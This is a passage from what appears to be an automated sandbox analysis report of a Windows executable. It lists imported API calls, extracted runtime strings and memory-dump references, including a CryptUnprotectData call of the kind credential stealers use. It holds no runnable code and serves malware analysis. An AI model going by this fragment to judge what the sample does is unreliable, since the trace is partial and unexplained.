                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,004118FA,?,?,0040C003,21750100,?), ref: 0040CF27
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectmemmove
                  • String ID:
                  • API String ID: 1275420628-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  • Unknown pseudo relocation protocol version %d., xrefs: 004355D4
                  • Unknown pseudo relocation bit size %d., xrefs: 00435509
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                  • API String ID: 544645111-395989641
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00435337
                  • @, xrefs: 004352E8
                  • VirtualProtect failed with code 0x%x, xrefs: 0043530A
                  • Address %p has no image-section, xrefs: 0043534B
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: QueryVirtual
                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
                  • API String ID: 1804819252-1098444051
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,00427469,?,00000000), ref: 004274AE
                  • GetLastError.KERNEL32(000000F4,000000F4,?,?,?,?,00427469,?,00000000), ref: 004274C1
                  • GetConsoleMode.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,000000F4,000000F4,?), ref: 004274FE
                  • memset.MSVCRT ref: 004275B8
                    • Part of subcall function 0042731B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00427337
                  Strings
                  • failed to write whole buffer:, xrefs: 004277EC
                  • Windows stdio in console mode does not support writing non-UTF-8 byte sequences, xrefs: 0042770D
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ConsoleErrorFileHandleLastModeWritememset
                  • String ID: Windows stdio in console mode does not support writing non-UTF-8 byte sequences$failed to write whole buffer:
                  • API String ID: 1752357600-2385713539
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • memset.MSVCRT ref: 0040D4F3
                  • SetLastError.KERNEL32(00000000), ref: 0040D551
                  • GetEnvironmentVariableW.KERNEL32(00000200,?,00000200,00000000), ref: 0040D55C
                  • GetLastError.KERNEL32(?,00000002,00000200,00000000), ref: 0040D567
                  • GetLastError.KERNEL32(?,00000002,00000200,00000000), ref: 0040D574
                  • GetLastError.KERNEL32(?,00000002,00000200,00000000), ref: 0040D5C1
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ErrorLast$EnvironmentVariablememset
                  • String ID:
                  • API String ID: 3677577337-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Startupmemset
                  • String ID: d0D$d0D$d0D
                  • API String ID: 1873301828-95588852
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualQuery.KERNEL32 ref: 0043529D
                  • VirtualProtect.KERNEL32 ref: 004352F7
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00439DB8), ref: 00435304
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Virtual$ErrorLastProtectQuery
                  • String ID: VirtualProtect failed with code 0x%x$@
                  • API String ID: 637304234-2953866262
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 00434F09
                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401492), ref: 00434F1A
                  • GetCurrentThreadId.KERNEL32 ref: 00434F22
                  • GetTickCount.KERNEL32 ref: 00434F2A
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401492), ref: 00434F39
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                  • String ID:
                  • API String ID: 1445889803-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TlsAlloc.KERNEL32(?,?,?,00428395,?,00427DFF,?,?,?,?,?), ref: 004283D6
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Alloc
                  • String ID: "SomeNone$L0D$L0D
                  • API String ID: 2773662609-2159131741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 0042A99C
                  • CloseHandle.KERNEL32(?,?,?), ref: 0042A9B6
                  • GetLastError.KERNEL32(?,?), ref: 0042A9BF
                  • CloseHandle.KERNEL32(?,?,?), ref: 0042A9CC
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Handle$Close$ErrorFileInformationLast
                  • String ID:
                  • API String ID: 4143594976-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleW.KERNEL32(?,00428213,?,?,?,?,?,004281C2,?,?,00428105,?,?,?,?,?), ref: 00428096
                  • GetProcAddress.KERNEL32(00000000,00428213), ref: 0042809D
                  Strings
                  • kernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive, xrefs: 00428047
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: kernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive
                  • API String ID: 1646373207-2150369052
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004351B3
                  • Unknown error, xrefs: 00435162
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: fprintf
                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-3474627141
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 0043578E
                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 004357B5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 004357BC
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,004359E7,?,?,?,?,?,00435048), ref: 004357DC
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                  • String ID:
                  • API String ID: 682475483-0
                  Uniqueness

                  Uniqueness Score: -1.00%